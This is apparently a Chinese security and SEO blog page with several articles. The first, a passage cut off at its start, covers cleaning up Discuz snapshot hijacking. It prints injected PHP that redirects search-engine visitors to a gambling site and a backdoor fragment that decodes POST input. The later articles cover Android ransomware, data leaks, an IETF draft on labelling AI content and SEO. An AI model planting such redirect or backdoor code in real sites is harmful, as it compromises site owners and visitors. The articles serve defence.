explode("|",_decode('NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg==')); 00X4 网站快照被劫持解决方法 1、进discuz后台找到工具-文件校验,找到最近被修改的php文件与源文件对比下。 2、dz的文件校验不会检查utility文件夹,除了upload里的文件,其他辅助功能文件一般用不到,如上传了请删除,避免被黑客利用。 3、使用后台文件校验看修改文件,UCcenter校验UC文件修改。 4、网站目录使用时间排序方式,查看最近修改的文件有没有可疑。 5、404态设置到位,可很大程度避免收录不存在的博彩劫持页面。 6、看网站目录内有没有被上传的tools目录或tools类型文件。 7、要有一查到底的决心,不然很难找到黑客埋藏的根基。 8、多方位加强防护,让劫持死于摇篮... 00X5 网站被劫持了怎么查看目录变化 站长们要学会从侧面发现快照劫持,不要仅仅在百度一个搜索引擎内site,要在多个搜索引擎内site,这样可以利用搜索引擎侧面检测反应网站快照劫持问题,只要有一个有劫持问题,就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的,因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的,还有就是你网站本身与搜索引擎爬虫友好度有关。 综上述解决快照劫持的大概步骤:校验文件-修改替换原始文件-设定404-举报/更新快照... 加强防范建议:插件不要随便使用,后门很多。 00X6 让你们见识下快照劫持字典文件、站中站脚本目录长什么样 快照劫持页面内容多为博彩、赌具、特服小姐等黄赌毒违法信息或其他办证,公关小姐类灰色外推行业关键词。 00X7 搜索引擎快照劫持扩展阅读 1、什么是搜索引擎快照劫持? 快照劫持:利用网站程序漏洞或爆破ftp,挂马篡改网页信息并主动post提交给搜索引擎,让其抓取收录,快照的内容多为博彩等推广内容。 2、搜索引擎快照劫持技术是什么? 搜索引擎劫持主要分快照劫持与跳转劫持,就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持,有的再生成新链接或上传大量静态页面挂黄赌毒博彩相关行业推广词;跳转劫持是使用跳转脚本让访问链接跳转到其他指定博彩站页面,主要是提高网站受众群体量与增加网站曝光度。 3、最新快照劫持及网页篡改网站入侵挂马问题 class_core.php文件插入跳转代码 error_reporting(E_ALL); @error_reporting(1); @$ref = strtolower($_SERVER['HTTP_REFERER']); @$jump_ref = explode("|","haoso.|so.|haosou.|google.|soso."); foreach($jump_ref as $r){ $r = trim($r); if(stristr($ref,$r)){ if($_GET['tid']>50000){ header('Location: http://www.xxxxxxxxx.com/?op5u'); die(); } } } <?php error_reporting(0);set_time_limit(0); $GuTou=@$_POST["gutou"]; if($GuTou){ $cc="";for($i=0;$i<strlen($GuTou);$i+=2) $cc.=urldecode("%".substr($GuTou,$i,2)); } ?> 如何发现被快照劫持了 使用语法 关键词 site:语法 【】【官网入口】... discuz被挂马discuz百度快照被劫持的解决方法 [DZ挂马]discuz!论坛360快照劫持的处理方法 dz论坛被挂马、快照劫持怎么防范? 关于dz论坛恶意挂赌博广告的排查心得 discuz被挂马_百度快照被劫持的解决办法 网站被挂马_各大搜索引擎快照被劫持的处理方法 本文转载至:微山湖SEO #### 【技术前沿】IETF提出新型HTTP头字段标准草案:为网页内容添加“AI成分”机读标签 8月28日消息,据科技媒体Tom's Hardware报道,互联网工程任务组(IETF近日推出了一份名为《AI内容披露头字段》(AI Content Disclosure Header)的标准草案,提议在网页HTTP响应中新增一类机读字段,用于声明人工智能在内容生成中的参与情况。 该草案旨在通过服务器响应的HTTP头信息,标准化的方式标记AI生成或修改内容,帮助搜索引擎、浏览器、内容归档系统等自动识别和处理AI参与创建的页面,在保证低资源开销的同时提升识别效率。 与目前常见的人工提示文字或可视化水印不同,这一机制无需人工干预解析,也避免了处理复杂元数据,所有信息均可被机器直接读取,有望大幅提高搜索引擎索引准确性、合规审查效率和归档系统处理能力。 拟引入的AI内容标识头包含五个核心字段: mode:AI使用模式 model:所使用的AI模型 provider:模型提供方 reviewed-by:审核人员/机构 date:生成或修订时间 其中,mode分为四类: none:未使用AI; ai-modified:人类原创、AI修改(如润色、摘要); ai-originated:AI生成并经人工编辑审核; machine-generated:几乎完全由AI自动生成,无人为干预。 IETF指出,统一AI标注机制可为网络爬虫和内容分析工具提供低延迟、高效率的判断依据,减少误判和额外资源消耗。目前该草案仍处于征求意见阶段,未来可能根据行业反馈进行调整和扩展。 #### 【技术瓜田惊爆】模型指纹技术实锤?Pangu Pro 大模型与 Qwen-2.5 相关性达 0.927 引发版权争议 今日,GitHub 上一篇兼具技术深度与行业爆点的论文引发热议。该研究提出的 "LLM-Fingerprint 模型指纹技术",直指通过注意力参数分布溯源预训练模型的可行性。核心结论显示:Pangu Pro MoE 模型与 Qwen-2.5 14B 模型的注意力参数分布相关性高达 0.927,这一数值远超行业内独立训练模型的正常差异范围,引发对模型知识产权的激烈讨论。 核心推断:从技术数据到版权质疑 论文作者通过实证分析提出两大关键推断: 技术路径非从零构建:Pangu Pro MoE 并非完全自研,而是通过 "upcycling(持续训练 + 架构调整)" 基于 Qwen 模型进行改造,即使从 Dense 架构转为 MoE 架构,核心参数指纹仍保留显著继承特征。 自研声明存疑:技术文档中 "完全自研" 的表述与参数指纹分析结果矛盾,可能涉及版权侵权与技术报告真实性争议。 模型指纹技术:如何锁定 "参数血缘"? 该技术的核心逻辑可拆解为三步: 特征提取:抓取模型各层多头注意力机制中 Q、K、V、O 矩阵的标准差,按层序排列并归一化,形成唯一的 "参数指纹序列"。 相关性计算:通过皮尔逊相关系数衡量不同模型的指纹序列相似度。实验证明,即使经历架构改造(如 MoE 拆分)或大规模微调,该指纹仍保持稳定性。 继承性验证:在已知继承关系的模型(如 Llama 变体、Qwen 社区微调版)中,指纹相关性显著高于独立训练模型(即使同属 Qwen 家族内部不同型号)。 争议升级:1 小时速答与学术交锋 论文发布 1 小时后,涉事团队在 GitHub Issue 中紧急回应,全盘否认抄袭指控,并称 LLM-Fingerprint 的评估方法 "缺乏科学依据"。但论文作者 HostAGI 团队随即在 Issue#8 中反驳,指出参数分布的高相关性已超越 "巧合" 范畴,双方围绕技术方法论展开激烈辩论。 吃瓜群众视角 当前事件已从技术讨论升级为行业伦理争议。脉脉等平台爆料显示,事件背后或牵扯 AI 实验室的人事博弈。正如网友调侃:"到底是自研还是换皮,就看 Pangu 能否拿出推翻 0.927 相关性的硬证据。" 目前,技术圈正等待涉事方进一步举证,让子弹再飞一会儿。 #### 【权威指南】CNNIC发布《.CN域名迁移技术手册》:从海外顶级域名平稳迁入中国的完整实战路径 核心事件:一份官方的“迁入”路线图 2025年12月15日,中国互联网络信息中心(CNNIC)正式发布了 《域名迁移技术指导手册》 。这份手册为计划将现有业务域名(如 .com, .net 等)迁移至 “.CN”国家顶级域名 的国内外机构,提供了一份由官方背书的、详尽的全流程技术指南。 这并非简单的流程说明,而是一份涵盖了域名注册、实名认证、DNS权威解析配置、网站系统适配、SSL证书、网站备案乃至SEO优化的“交钥匙”工程手册。它的发布,标志着国家顶级域名服务体系正以更开放、更专业的姿态,为全球业务提供可预期、可操作的平滑迁移方案。 手册核心价值解读:不止于“如何注册” 与常见的域名注册指南不同,本手册直指企业级域名迁移中的核心痛点——如何在保证业务零中断、数据零丢失、权重零损失的前提下,完成域名体系的整体切换。其核心价值体现在三个层面: 流程标准化:将复杂的迁移工程分解为清晰的线性步骤(如图1所示),从查询可用性到最终停止旧服务,形成了可复用的标准操作程序(SOP)。 风险可视化:在每个关键环节(如DNS切换、备案空窗期)明确提示了潜在风险及应对建议,强调“监测与回退机制”,将业务连续性放在首位。 技术中立化:手册并未绑定特定服务商,而是客观阐述了自建DNS权威、外部托管等不同技术路线的配置方法,赋予机构充分的自主选择权。 迁移实战:三大阶段关键操作与避坑指南 第一阶段:域名注册与实名认证——筑牢法律与权属基石 核心动作: 预查询:通过 whois.cnnic.cn 确认目标 .cn 域名可用性。 选择注册商:优先考虑与原域名服务商一致,以简化管理。务必选择CNNIC授权认证的注册服务机构(名单手册中已提供官方链接)。 完成实名认证:这是 .CN 域名注册的强制性法律要求。需提交真实、准确、完整的身份信息。 特别注意事项: .gov.cn 域名:党政机关注册有独立、更严格的流程,需直接联系CNNIC或通过指定渠道办理,并配合电话回访等核验。 隐私保护:建议开启域名隐私保护功能,防止注册信息(Whois信息)泄露带来的社会工程学攻击风险。 第二阶段:DNS配置——构建稳定高效的解析中枢 这是迁移中最关键的技术环节,手册重点阐述了两种主流方案: 方案A:自建权威DNS服务器 技术要求:需具备公网服务器、部署权威DNS软件(如BIND)、配置防火墙规则(放行TCP/UDP 53端口)。 关键配置: 创建新域名的区域文件(Zone File),完整复制原域名的所有解析记录(A、AAAA、MX、TXT等)。 NS记录必须使用 .CN 域名(如 ns1.yourcompany.cn),并确保这些NS主机名本身有正确的A/AAAA记录,形成解析闭环。 在注册商处将域名的NS记录指向自建服务器。 优势:自主可控,解析策略高度定制。 挑战:对运维能力要求高,需自行保障服务高可用与抗DDoS能力。 方案B:使用外部托管权威DNS服务 推荐路径:优先选择与原域名相同的托管商(如Cloudflare、阿里云解析等),实现配置一键迁移。 最佳实践:手册特别建议,优先选择使用 国家顶级域名(如 sdns.cn) 作为权威服务器地址的服务,以提升域名体系的自主可控性与稳定性。 生效周期:配置后需等待 24-48小时 全球DNS缓存刷新,期间需严密监控。 统一性建议:手册提出一项前瞻性最佳实践——在 .CN 域名就绪后,逐步将原有海外域名的权威服务器也统一至此套体系,以实现全球解析策略的集中管理和风险收敛。 第三阶段:新域名启用与业务切换——实现平滑过渡 SSL/TLS证书:务必为 .CN 域名申请并部署新的SSL证书,同时确保旧域名证书在并行期间有效,避免安全警告。 网站备案:备案是 .CN 域名在中国大陆提供访问服务的法定前提。备案完成前,切勿将新域名用于公开访问。 SEO与权重迁移: 在网站服务器或CDN上,为旧域名设置 301永久重定向 至新域名对应页面。 在Google Search Console、百度站长平台等工具中,添加并验证新域名。 更新网站的Sitemap、Robots.txt及所有内部链接、静态资源(JS/CSS/图片)引用地址。 并行期与回退:新旧域名应至少并行运行半年。建立实时监控,一旦新域名出现严重问题,可立即切回旧域名,保障业务无损。 【主机帮】深度建议:安全视角下的迁移考量 作为网络安全博客,我们额外提醒您在迁移过程中关注以下安全要点: 防御DNS劫持与投毒:在DNS切换期间,攻击者可能利用缓存投毒攻击。确保您的权威DNS服务(无论自建还是托管)启用了DNSSEC(域名系统安全扩展)签名,并配置严格的TSIG密钥管理。 防范社会工程学:域名注册信息(Whois)的变更是攻击者的关注点。确保注册商账户启用双因素认证(2FA),并警惕任何冒充注册局或注册商的转移、确认邮件。 审计与监控:迁移完成后,对DNS解析记录进行全面审计,清理遗留的、不再使用的记录(如陈旧的A记录、测试用的TXT记录),减少攻击面。持续监控DNS查询的异常模式。 结论 CNNIC此次发布的《手册》,为“域名入华”提供了前所未有的清晰技术路径。它不仅仅是一本操作手册,更是中国互联网基础设施服务体系成熟化、国际化、服务化的重要标志。 对于计划深耕中国市场的国际企业,或寻求提升数字资产自主可控性的国内机构,遵循此指南进行系统化迁移,将能最大限度地规避技术风险、法律风险与业务风险,实现数字品牌资产的平稳过渡与安全加固。 (主机帮提示:重大域名迁移项目建议分阶段在测试环境充分验证,并制定详尽的回滚预案。安全与稳定,高于一切。) #### 【注意】春运终于来了!小心自己买了假票… 1月3日早上6点开始 一年一度的春运抢票大戏再一次拉开帷幕! 小姐姐可以大胆的预测。 不少小绵羊不惜六点就挣扎着醒来抢票 而黄牛们全都随时准备起跑! 各种牛X刷票软件上线,全体黄牛花式喊麦 票子,要么?票子,要么?票子,要么? 春运车票开售大戏,怎么少得了小姐姐去围观一下呢!但竞争激烈,抢不到票的我们要怎么回家? 要这样? 还是想我张大佛爷和二爷送你回家? 而就在这场抢票浪潮中, 骗子已经挖好坑,就等你跳了! 在深圳打工的林先生在网上通过搜索引擎找到一家购买火车票的网站,骗子冒充客服人员在登记好基本资料之后,跟林先生说订票已经成功,汇定金即可出票。但骗子在林先生付款后给他打来电话,称多收了钱,并询问银行卡内的余额,林先生没多想便告知卡内还剩8610元,对方称可通过汇款取回100元,于是让事主操作汇款。林先生信以为真,再次汇款,结果账户内钱款当即被清零。 而在广州的张先生想购买一张春节期间回老家的火车票,遭遇了“一票难求”的困境。听说很多人都在社交软件群里有链接渠道可以购买“黄牛票”,归家心切的张先生加入了一个社交软件群,在群里的人发出一条链接后,张先生通过链接渠道预定了一张所谓的“火车票”。在付款的时候张先生将522元钱打到对方提供的二维码账号上,没想到对方收到钱后链接已经失效。 如何在这场年终大戏中识破“反派”? 小姐姐支招,教你如何防火防盗防骗子! 【擦亮双眼,认清官方买票标识】 铁路部门唯一网上购票软件为:铁路12306。对于来源不明的抢票软件别轻信下载。 【把这个电话号码当成男朋友的号码来记】 铁路部门唯一网上购票网站和电话分别为:http//:www.12306.cn(中国铁路客户服务中心)和95105105,其他包括以“400、800、9501”等开头的号码都是虚假热线。 【黄牛党的二维码莫扫,陌生链接莫点】 建议通过正规第三方手机应用平台下载,查看该平台是否具有相关备案和购票资质。不要随意点击陌生链接、扫描来历不明的二维码下载应用。 【天上不会掉馅饼!哪怕会,也是掉花盆】 在购票的过程中,千万不能贪图小便宜看到“超低价”、“最低折扣”等字眼就付款购票了。同时,在购票的过程中,如果售票方时提供个人账户要求进行转账支付的,请相信一个真理,天上是真没有掉馅饼的! 【给你无条件退款的,请先思考为什么】 购票后,必须对所购买的电子票进行查询验证。同时,到指定网址重新填写银行卡信息或去提款机退款,此类情况均为欺诈,一定要注意辨别。 自己抢不到票,还要给钱让骗子过年 有什么比这更闹心呢! 因此百度安全提醒大家: 春运购票,不要轻信抢票软件和陌生链接。 认清官方购票渠道。 以下人员是不会问你索要验证码的: 铁路部门客服人员、公安民警、隔壁大妈 最后,祝大家顺利购票,回家过年! #### 【深度分析】“服务器升级”成数据泄露新幌子?韩国LG U+因AI服务运维失误致用户通话内容外泄 事件焦点:一次“非黑客”的数据泄露近日,韩国主要电信运营商LG U+陷入新的数据安全风波。其人工智能语音助手服务“ixi-O”被曝发生用户数据泄露。与常见的黑客入侵不同,此次事件的直接原因被官方归咎于“服务器升级过程中发生的错误”,导致36名用户的通话摘要、对方电话号码及通话时间等信息异常暴露。尽管LG U+声明身份证、护照、金融信息等核心敏感数据未受影响,且因“未达强制申报标准”而主动上报,但事件中暴露的响应迟滞与历史信任危机,使其面临严峻的舆论质疑。事件时间线与关键争议点运维失误导致泄露:官方初步调查称,事故源于ixi-O服务的后台服务器升级流程中出现错误配置或故障,致使部分用户数据被置于可不当访问的状态。14小时滞后响应:泄露发生后,LG U+并非通过自身监控系统发现,而是在长达14小时后,经由用户主动举报才获悉事件。这暴露出其主动安全监测与异常数据流动检测能力存在显著短板。信任危机加剧:此次事件发生在LG U+因涉嫌曾借“服务器升级”之名隐瞒黑客入侵事实而接受政府联合调查的敏感时期。尽管官方竭力区分此次“事故”与彼次“攻击”,但“服务器升级”一词的再度出现,无疑严重削弱了公众信任。纵深透视:韩国电信业的安全“多事之秋”本次事件并非孤立。它发生在韩国电信行业数据安全防线屡被击穿的背景之下:今年稍早,韩国最大的通信运营商SK电讯遭遇重大网络攻击,导致近2700万条用户信息外泄,震惊全国。监管重拳:韩国科技部门对此开出高额罚单(约14.4万元人民币),并下达了一系列严厉的整改指令,包括:CEO亲自负责数据治理、强制季度安全检查、大幅增加安全人员与预算投入。这标志着监管态度从“事后处罚”转向“事前追责”。这两起事件共同揭示了一个严峻现实:电信运营商作为海量敏感数据的“保管人”,其内部运维风险与外部攻击威胁同样致命,且前者往往因隐蔽性而更易被忽视。【主机帮】安全启示录:从“被动防御”到“主动治理”LG U+事件为所有存储和处理用户数据的企业,尤其是云计算、电信、AI服务提供商,敲响了多重警钟:警示一:将“变更管理”提升至最高安全等级风险认知:服务器升级、配置更新等日常运维操作,绝非低风险任务。一次错误的发布、一个配置失误,都可能瞬间导致大规模数据暴露。实战建议:严格执行灰度发布:任何涉及数据服务的变更,必须遵循分批次、小流量、可观测的发布流程。实施“双人复核”与自动化检查:关键配置变更需经开发与运维双方确认,并利用自动化工具在发布前后校验数据访问权限与状态。建立“一键回滚”机制:确保在出现异常时,能在分钟级内恢复至稳定状态。警示二:建立“以数据为中心”的实时监控与响应体系问题核心:依赖用户举报发现数据泄露,是安全体系的彻底失败。实战建议:监控异常数据访问模式:部署UEBA(用户实体行为分析)工具,实时分析并警报对敏感数据的异常批量查询、非常规时间访问等行为。部署数据泄露防护(DLP):在网络出口对结构化与非结构化数据流动进行内容识别与阻断。设立7x24小时安全运营中心(SOC):确保告警能被即时分析与处置。警示三:透明是重建信任的唯一途径教训:在已有负面历史的情况下,任何不透明或迟滞的沟通都会加倍摧毁信誉。实战建议:制定明确的数据泄露应急沟通预案:明确内部上报链条、对外声明口径、用户通知流程,并进行演练。遵循“快速、透明、负责”原则:在确认事件后,尽可能在黄金时间内(如1小时内)发布初步声明,并持续更新进展。结语:运维的“一念之差”与安全的“千斤之重”LG U+的“ixi-O”数据泄露事件,本质上是一场由内部运维风险引发的安全危机。它残酷地揭示:在数据安全领域,最坚固的堡垒往往从内部被攻破。当“服务器升级”从一项常规技术工作,演变为数据泄露的根源和公众怀疑的借口时,企业失去的不仅是数据,更是赖以生存的信任。对于所有技术管理者而言,此事件传递的核心信息是:必须将每一次代码发布、每一次配置变更,都视为一次潜在的安全攻击进行管控。 唯有将严谨的变更管理、无缝的实时监控与绝对的透明文化融入组织血液,才能在数字时代真正担负起“数据保管人”的重任。(主机帮,专注透视每一次安全事件背后的技术根源与管理缺失,为您提供筑牢防线的实战策略。) #### 【深度技术分析】DroidLock新型安卓勒索软件曝光:无需加密,锁屏即勒索,你的解锁图案正在被直播窃取 威胁概述:一种“更高效”的移动端勒索策略 近期,移动安全公司Zimperium(Google应用防御联盟成员)捕获并披露了一款名为 DroidLock 的新型安卓恶意软件。该软件正在网络中快速传播,其主要特点是摒弃了传统文件加密的复杂流程,转而采用技术门槛更低、心理压迫感更强的“锁屏勒索”。它通过完全接管设备屏幕并威胁在24小时内删除所有文件,达到与加密勒索相同的敲诈目的,标志着移动勒索威胁的战术演变。 目前,该恶意软件主要针对西班牙语用户,通过伪装网站分发,但其攻击框架具备快速适配、全球扩散的潜力。 技术深度剖析:DroidLock的三阶段攻击链 DroidLock的攻击流程经过精心设计,层层递进,旨在最大化绕过用户警惕并获取系统最高控制权。 第一阶段:社会工程学诱饵(入侵) 分发渠道:通过仿冒合法应用的恶意网站传播,诱导用户下载一个名为 “Dropper” 的释放器程序。 诱导话术:安装后,Dropper会弹窗提示“系统更新”,利用用户对系统安全更新的信任,诱骗其点击安装真正的恶意负载(Payload)。 第二阶段:权限掠夺与控制(扎根)恶意负载安装后,会立即索要安卓系统中两项最敏感、破坏性最强的权限: 设备管理器权限:允许其静默卸载应用、远程锁屏、恢复出厂设置。 无障碍服务权限:授予其模拟用户点击、读取屏幕内容、监听通知、甚至记录输入(如密码、图案)的能力。 关键攻击手法:DroidLock会生成一个全屏透明覆盖层。当用户在其上绘制解锁图案时,该手势会被无障碍服务全程捕获,并立即发送给攻击者。这意味着,用户以为自己在解锁手机,实则是在“直播”自己的隐私密码。 第三阶段:全面控制与勒索(变现)获得权限后,DroidLock化身为设备的“影子管理员”: 远程控制:利用内置的VNC(虚拟网络控制台)服务器,攻击者可在设备闲置时建立远程桌面连接,实现完全实时控制。 多功能恶意指令集:支持至少15种指令,涵盖静音、拍照、录屏、窃取短信/通讯录/通话记录、卸载安全应用、阻止来电等,实现信息窃取与反侦查。 终极勒索:通过WebView加载一个无法关闭的全屏锁屏界面,并修改设备的PIN码或禁用生物识别。界面留下一个ProtonMail邮箱,威胁受害者必须在24小时内支付赎金,否则将远程触发文件永久删除。 与传统勒索软件的对比分析 特征维度传统勒索软件 (如Android/Filecoder)DroidLock (锁屏勒索软件)核心攻击方式加密设备内部存储及SD卡文件不加密文件,直接锁定屏幕,阻断一切交互技术复杂度较高,需实现稳定可靠的加密算法较低,主要依赖系统权限滥用与界面覆盖用户感知发现时文件已无法打开,但设备可能仍可部分操作立即、完全无法使用设备,压迫感极强恢复难度极高,无密钥几乎无法解密理论上可绕过(如ADB调试),但对普通用户极难取证价值文件仍在,有分析价值攻击者可能远程执行“擦除”指令,数据彻底消失 【主机帮】企业级防御与个人应急响应指南 对于企业安全管理员(防范员工设备成为入口) 推行移动设备管理:部署MDM解决方案,严格管控从非官方商店安装应用的行为,并能远程锁定或擦除已确认感染的设备。 加强安全意识培训:重点教育员工识别“系统更新”类钓鱼诱饵,明确公司设备禁止侧载应用。 网络层拦截:在办公网络出口部署安全网关,拦截对已知恶意软件分发域名的访问。 对于个人用户(即时防护与应急) 预防措施(立即执行): 坚决禁用“未知来源”安装:仅在Google Play商店下载应用。如需侧载,安装后立即关闭该开关。 警惕高危权限:对索要无障碍服务和设备管理器权限的应用保持最高警觉,除非是绝对可信的系统工具或安全软件。 启用Google Play Protect:确保其在设置中处于开启状态,它已能识别DroidLock。 定期更新系统:及时安装安卓安全补丁,修复可能被利用的系统漏洞。 疑似感染后的应急响应: 尝试安全模式:重启手机,在启动过程中长按音量减键进入安全模式(此模式下所有第三方应用被禁用),尝试卸载可疑应用。 使用ADB命令移除(高级):若已开启USB调试,可通过连接电脑使用 adb shell pm uninstall --user 0 <package_name> 命令强制卸载。 终极方案:恢复出厂设置:在Recovery模式下执行(注意:这将清除所有数据)。在执行前,若设备被锁,请确认是否有重要数据未备份,因为勒索威胁可能真实执行。 深度思考:为何“锁屏勒索”可能更危险? DroidLock的出现揭示了一个趋势:恶意软件作者正在追求“效率最大化”。加密大量文件耗电、耗时、易引发卡顿而被察觉。而锁屏勒索: 实现简单:利用安卓合法的覆盖层和权限机制即可。 见效迅速:用户瞬间失去控制权,恐慌情绪加剧。 对抗成本低:无需维护复杂的加密/解密体系。 心理压迫强:“24小时删除”的倒计时,比一个静态的加密提示更具逼迫性。 对于攻击者而言,这更像一场“心理战”而非“技术战”。对于防御方,这意味着传统的“备份即可抵御勒索”的思维在移动端可能失效,因为攻击者的威胁目标从“数据可读性”转向了“设备可用性”和“数据存在性”本身。 结论 DroidLock是移动安全威胁的一次务实化转向。它提醒我们,在安卓的开放生态中,最高级别的系统权限一旦被恶意软件掌控,其造成的破坏可以简单而彻底。防护的核心,从未改变:警惕来源,审慎授权。 作为普通用户,牢记“天上不会掉系统更新”;作为安全从业者,需将此类无需加密的锁屏威胁纳入移动安全事件响应预案。谷歌的快速响应值得肯定,但总有设备处于防护的盲区之中,自我防范永远是最后、也是最关键的一道防线。 (主机帮将持续追踪全球恶意软件动态,为您提供前沿的威胁情报与实战防御解读。) #### 【科普】百度搜索引擎工作原理 作为seo工作人员,搜索引擎运行原理是必须要了解的,包括页面质量白皮书、搜索引擎优化指南,今天重点解读下搜索引擎整个工作原理过程分析。 搜索引擎的主要工作过程包括:抓取、存储、页面分析、索引、检索等几个主要过程。也就是常说的抓取、过滤、收录、排序四个过程,下面详解的讲解每个过程,及有哪些影响 一、搜索引擎抓取 Spider抓取系统是搜索引擎数据来源的重要保证,如果把web理解为一个有向图,那么spider的工作过程可以认为是对这个有向图的遍历。从一些重要的种子 URL开始,通过页面上的超链接关系,不断的发现新URL并抓取,尽最大可能抓取到更多的有价值网页。 搜索引擎工作原理解读 影响抓取的因素 1、抓取友好性 互联网资源庞大的数量级,这就要求抓取系统尽可能的高效利用带宽,在有限的硬件和带宽资源下尽可能多的抓取到有价值资源。 2、用抓取返回码示意 简单介绍几种百度支持的返回码: 1)最常见的404代表“NOT FOUND”,认为网页已经失效,通常将在库中删除,同时短期内如果spider再次发现这条url也不会抓取; 2)503代表“Service Unavailable”,认为网页临时不可访问,通常网站临时关闭,带宽有限等会产生这种情况。 3)403代表“Forbidden”,认为网页目前禁止访问。如果是新url,spider暂时不抓取,短期内同样会反复访问几次;如果是已收录url,不会直接删除,短期内同样反复访问几次。如果网页正常访问,则正常抓取;如果仍然禁止访问,那么这条url也会被认为是失效链接,从库中删除。 4)301代表是“Moved Permanently”,认为网页重定向至新url。当遇到站点迁移、域名更换、站点改版的情况时,我们推荐使用301返回码,同时使用站长平台网站改版工具,以减少改版对网站流量造成的损失。 3、取优先级调配 由于互联网资源规模的巨大以及迅速的变化,对于搜索引擎来说全部抓取到并合理的更新保持一致性几乎是不可能的事情,因此这就要求抓取系统设计一套合理的抓取优先级调配策略。主要包括:深度优先遍历策略、宽度优先遍历策略、pr优先策略、反链策略、社会化分享指导策略等等 4、取反作弊 spider在抓取过程中往往会遇到所谓抓取黑洞或者面临大量低质量页面的困扰,这就要求抓取系统中同样需要设计一套完善的抓取反作弊系统 百度搜索引擎工作原理 对于网站抓取频次的断断原则 1,网站更新频率:更新快多来,更新慢少来,直接影响Baiduspider的来访频率 2,网站更新质量:更新频率提高了,仅仅是吸引了Baiduspier的注意,Baiduspider对质量是有严格要求的,如果网站每天更新出的大量内容都被Baiduspider判定为低质页面,依然没有意义。 3,连通度:网站应该安全稳定、对Baiduspider保持畅通,经常给Baiduspider吃闭门羹可不是好事情 4,站点评价:百度搜索引擎对每个站点都会有一个评价,且这个评价会根据站点情况不断变化,是百度搜索引擎对站点的一个基础打分 二、搜索引擎过滤垃圾内容 1, 重复内容的网页:互联网上已有的内容,百度必然没有必要再收录。 2, 主体内容空短的网页 1)有些内容使用了百度spider无法解析的技术,如JS、AJAX等,虽然用户访问能看到丰富的内容,依然会被搜索引擎抛弃 2)加载速度过慢的网页,也有可能被当作空短页面处理,注意广告加载时间算在网页整体加载时间内。 3)很多主体不突出的网页即使被抓取回来也会在这个环节被抛弃。 3, 部分作弊网页 4、各种过滤,举例可能包含过滤掉死链、重复数据、色情、垃圾结果以及你懂的; 搜索引擎蜘蛛工作原理 三、如何更好的被收录,建立索引 哪些网页可以进入优质索引库呢。其实总的原则就是一个:对用户的价值。包括却不仅于: 1,有时效性且有价值的页面:在这里,时效性和价值是并列关系,缺一不可。有些站点为了产生时效性内容页面做了大量采集工作,产生了一堆无价值面页,也是百度不愿看到的. 2,内容优质的专题页面:专题页面的内容不一定完全是原创的,即可以很好地把各方内容整合在一起,或者增加一些新鲜的内容,比如观点和评论,给用户更丰富全面的内容。 3,高价值原创内容页面:百度把原创定义为花费一定成本、大量经验积累提取后形成的文章。千万不要再问我们伪原创是不是原创。 4,重要个人页面:这里仅举一个例子,科比在新浪微博开户了,即使他不经常更新,但对于百度来说,它仍然是一个极重要的页面。 百度搜索引擎蜘蛛 四、百度搜索引擎排序影响因素 1,相关性:网页内容与用户检索需求的匹配程度,比如网页包含的用户检查关键词的个数,以及这些关键词出现的位置;外部网页指向该页面所用的锚文本等 2,权威性:用户喜欢有一定权威性网站提供的内容,相应的,百度搜索引擎也更相信优质权威站点提供的内容。 3,时效性:时效性结果指的是新出现的网页,且网页内承载了新鲜的内容。目前时效性结果在搜索引擎中日趋重要。 4,重要性:网页内容与用户检查需求匹配的重要程度或受欢迎程度 5,丰富度:丰富度看似简单却是一个覆盖范围非常广的命题。可以理解为网页内容丰富,可以完全满足用户需求;不仅可以满足用户单一需求,还可以满足用户的延展需求。 6,受欢迎程度:指该网页是不是受欢迎。 7、终排序,将最能满足用户需求的结果排序在最前,可能包括的有用信息如:网站的整体评价、网页质量、内容质量、资源质量、匹配程度、分散度、时效性等 总结:这整个过程就是搜索引擎抓取到排名结果页的计算过程,当然其中影响排名的因素还有很多,这个是网页分析技术,但网站的总体得分是由每个网页组成,所以说要做好每个网页的细节优化,做好用户用户体验,提升网站排名。 #### 【紧急通报】WordPress 6.9升级陷阱:部分站点性能骤降50倍,CPU锁死100%,回滚是唯一解 核心事件:一次“成功”升级引发的性能灾难 2025年12月2日,WordPress 6.9 正式版向全球推送。然而,一场静默的性能危机随之而来。部分站长在升级后发现,网站陷入了“间歇性休克”:页面加载时间从毫秒级暴增至20秒,CPU使用率持续爆满至100%。这并非普遍现象,但对遭遇它的站点而言,影响是致命且立即可见的。 问题表现:从“闪电”到“龟速”的诡异蜕变 根据科技博主Günter Born的实测与社区大量反馈,受影响的站点呈现以下明确症状: 加载时间灾难性延长: 升级前: 页面加载约 0.4秒(健康)。 升级后: 页面加载延迟至 4秒至20秒 不等,无论访客还是管理员后台均受影响。 资源监控指标异常: OPCache 异常: 通过 Query Monitor 工具观察到,PHP字节码缓存(OPCache)的使用率异常卡在 94% 的高位,并持续提示需要清理。此状态在常规优化后仍无法解除。 CPU 锁死: Reddit及社区有管理员报告,服务器 CPU 使用率持续锁定在100%,导致托管环境下的其他站点也受到牵连。 排查手段失效: 尝试调高PHP版本、禁用所有插件、切换至默认主题等标准故障排除步骤,均未能解决问题。这表明冲突很可能深植于WordPress核心与特定服务器环境的交互中。 影响范围与根源推测 目前,WordPress官方尚未将此认定为普遍性核心缺陷,多数站点升级后运行平稳。但综合社区分析,问题根源指向几个可能的方向: 与特定主题/插件深度兼容性问题: 尽管有案例指向流行主题(如WoodMart),但未使用该主题的站点同样中招,表明可能存在多个未知的冲突源。 核心与PHP缓存机制(OPCache)的交互故障: 异常的OPCache使用率是强关联信号,可能暗示6.9版本在特定条件下触发了缓存机制的异常处理或循环,导致性能雪崩。 特定服务器环境(PHP版本、扩展、配置)的边际案例: 问题在混合环境中被触发,难以单一复现。 核心结论是:这不是一个可通过简单设置调整就能修复的问题,而是一个与环境强相关的、深层次的兼容性故障。 【主机帮】紧急处置方案与深度建议 如果您已经升级至WordPress 6.9并遭遇此类性能断崖,请立即按以下步骤操作: 第一步:立即回滚(最有效解决方案)所有社区报告均证实,回退至WordPress 6.8.3是当前唯一能立即彻底恢复正常的方案。 使用回滚插件: 通过“WP Downgrade”或“Core Rollback”等插件,安全降级核心至 6.8.3 版本(发布于2025年10月)。 手动回滚(适用于高级用户): 备份数据库后,通过FTP/SFTP替换除 wp-content 目录和 